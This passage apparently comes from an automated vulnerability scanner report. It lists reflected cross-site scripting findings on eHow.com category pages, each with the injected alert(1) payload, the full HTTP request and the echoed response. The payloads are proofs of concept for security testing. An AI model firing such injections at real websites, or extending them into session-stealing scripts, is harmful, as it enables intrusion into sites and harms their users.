<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Car Repair & Maintenance - How To Information | e ...[SNIP]... <fb:like href="http://www.ehow.com/car-repair-and-maintenance/?81bbf'-alert(1)-'0dd7b3504d5=1" ref="like" width="300"> ...[SNIP]...
1.359. http://www.ehow.com/careers/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/careers/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload da1da'-alert(1)-'b38942ddcfd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /careers/?da1da'-alert(1)-'b38942ddcfd=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:28 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 75360
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Careers - How To Information | eHow.com</title>
1.360. http://www.ehow.com/cars/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/cars/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9209d'-alert(1)-'45b907ee68f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cars/?9209d'-alert(1)-'45b907ee68f=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:12:23 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 70759
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Cars - How To Information | eHow.com</title> < ...[SNIP]... <fb:like href="http://www.ehow.com/cars/?9209d'-alert(1)-'45b907ee68f=1" ref="like" width="300"> ...[SNIP]...
1.361. http://www.ehow.com/computer-software/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ehow.com
Path: /computer-software/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 206d4'-alert(1)-'dbefd3749fe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /computer-software/?206d4'-alert(1)-'dbefd3749fe=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:24 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 72900
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Computer Software - How To Information | eHow.com ...[SNIP]... <fb:like href="http://www.ehow.com/computer-software/?206d4'-alert(1)-'dbefd3749fe=1" ref="like" width="300"> ...[SNIP]...
1.362. http://www.ehow.com/computers/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ehow.com
Path: /computers/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fdff3'-alert(1)-'174bc4ab464 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /computers/?fdff3'-alert(1)-'174bc4ab464=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:23 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 75189
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Computers - How To Information | eHow.com</title> ...[SNIP]... <fb:like href="http://www.ehow.com/computers/?fdff3'-alert(1)-'174bc4ab464=1" ref="like" width="300"> ...[SNIP]...
1.363. http://www.ehow.com/culture-and-society/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ehow.com
Path: /culture-and-society/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2b5e0'-alert(1)-'eff10e5d87 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /culture-and-society/?2b5e0'-alert(1)-'eff10e5d87=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:21 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 72021
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Culture & Society - How To Information | eHow.com ...[SNIP]... <fb:like href="http://www.ehow.com/culture-and-society/?2b5e0'-alert(1)-'eff10e5d87=1" ref="like" width="300"> ...[SNIP]...
1.364. http://www.ehow.com/diseases-and-conditions/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ehow.com
Path: /diseases-and-conditions/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8faf8'-alert(1)-'92bb278d1ba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /diseases-and-conditions/?8faf8'-alert(1)-'92bb278d1ba=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:32 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 71305
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Diseases & Conditions - How To Information | eHow ...[SNIP]... <fb:like href="http://www.ehow.com/diseases-and-conditions/?8faf8'-alert(1)-'92bb278d1ba=1" ref="like" width="300"> ...[SNIP]...
1.365. http://www.ehow.com/drugs-and-supplements/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ehow.com
Path: /drugs-and-supplements/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fe97d'-alert(1)-'7b1d74f9c1b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /drugs-and-supplements/?fe97d'-alert(1)-'7b1d74f9c1b=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:51 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 72692
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Drugs & Supplements - How To Information | eHow.c ...[SNIP]... <fb:like href="http://www.ehow.com/drugs-and-supplements/?fe97d'-alert(1)-'7b1d74f9c1b=1" ref="like" width="300"> ...[SNIP]...
1.366. http://www.ehow.com/education/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ehow.com
Path: /education/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6087c'-alert(1)-'194ef36dd58 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /education/?6087c'-alert(1)-'194ef36dd58=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:02 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 75234
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Education - How To Information | eHow.com</title> ...[SNIP]... <fb:like href="http://www.ehow.com/education/?6087c'-alert(1)-'194ef36dd58=1" ref="like" width="300"> ...[SNIP]...
1.367. http://www.ehow.com/ehow-family/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ehow.com
Path: /ehow-family/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c767"><script>alert(1)</script>be6c4ab1e42 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ehow-family/?7c767"><script>alert(1)</script>be6c4ab1e42=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:10 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45027
1.368. http://www.ehow.com/ehow-food/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ehow.com
Path: /ehow-food/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b3a1"><script>alert(1)</script>79143987f86 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ehow-food/?6b3a1"><script>alert(1)</script>79143987f86=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:10 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46088
1.369. http://www.ehow.com/ehow-health/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ehow.com
Path: /ehow-health/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f509"><script>alert(1)</script>873ede6293d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ehow-health/?3f509"><script>alert(1)</script>873ede6293d=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:10 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43261
1.370. http://www.ehow.com/ehow-home/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ehow.com
Path: /ehow-home/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3196"><script>alert(1)</script>92b0e28812b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ehow-home/?d3196"><script>alert(1)</script>92b0e28812b=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:10 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45054
1.371. http://www.ehow.com/ehow-money/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ehow.com
Path: /ehow-money/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5f86"><script>alert(1)</script>d7f01f7f7f6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ehow-money/?f5f86"><script>alert(1)</script>d7f01f7f7f6=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:11 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46741
1.372. http://www.ehow.com/ehow-style/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ehow.com
Path: /ehow-style/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 497ab"><script>alert(1)</script>953c40a3a58 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ehow-style/?497ab"><script>alert(1)</script>953c40a3a58=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:10 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45257
1.373. http://www.ehow.com/ehow-tax-time/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ehow.com
Path: /ehow-tax-time/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c261"><script>alert(1)</script>ad4ad1bb267 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ehow-tax-time/?7c261"><script>alert(1)</script>ad4ad1bb267=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:11 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43139
1.374. http://www.ehow.com/electronics/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ehow.com
Path: /electronics/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 535c5'-alert(1)-'e8bfb8c2480 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /electronics/?535c5'-alert(1)-'e8bfb8c2480=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:58 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 70812
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Electronics - How To Information | eHow.com</titl ...[SNIP]... <fb:like href="http://www.ehow.com/electronics/?535c5'-alert(1)-'e8bfb8c2480=1" ref="like" width="300"> ...[SNIP]...
1.375. http://www.ehow.com/family-health/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ehow.com
Path: /family-health/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3603c'-alert(1)-'0c79c8c5b9e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /family-health/?3603c'-alert(1)-'0c79c8c5b9e=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:58 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 72073
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Family Health - How To Information | eHow.com</ti ...[SNIP]... <fb:like href="http://www.ehow.com/family-health/?3603c'-alert(1)-'0c79c8c5b9e=1" ref="like" width="300"> ...[SNIP]...
1.376. http://www.ehow.com/fashion-and-style/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ehow.com
Path: /fashion-and-style/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e622d'-alert(1)-'816f55ab996 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /fashion-and-style/?e622d'-alert(1)-'816f55ab996=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:00 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 71917
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Fashion & Style - How To Information | eHow.com</ ...[SNIP]... <fb:like href="http://www.ehow.com/fashion-and-style/?e622d'-alert(1)-'816f55ab996=1" ref="like" width="300"> ...[SNIP]...
1.377. http://www.ehow.com/fitness/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ehow.com
Path: /fitness/
Issue detail
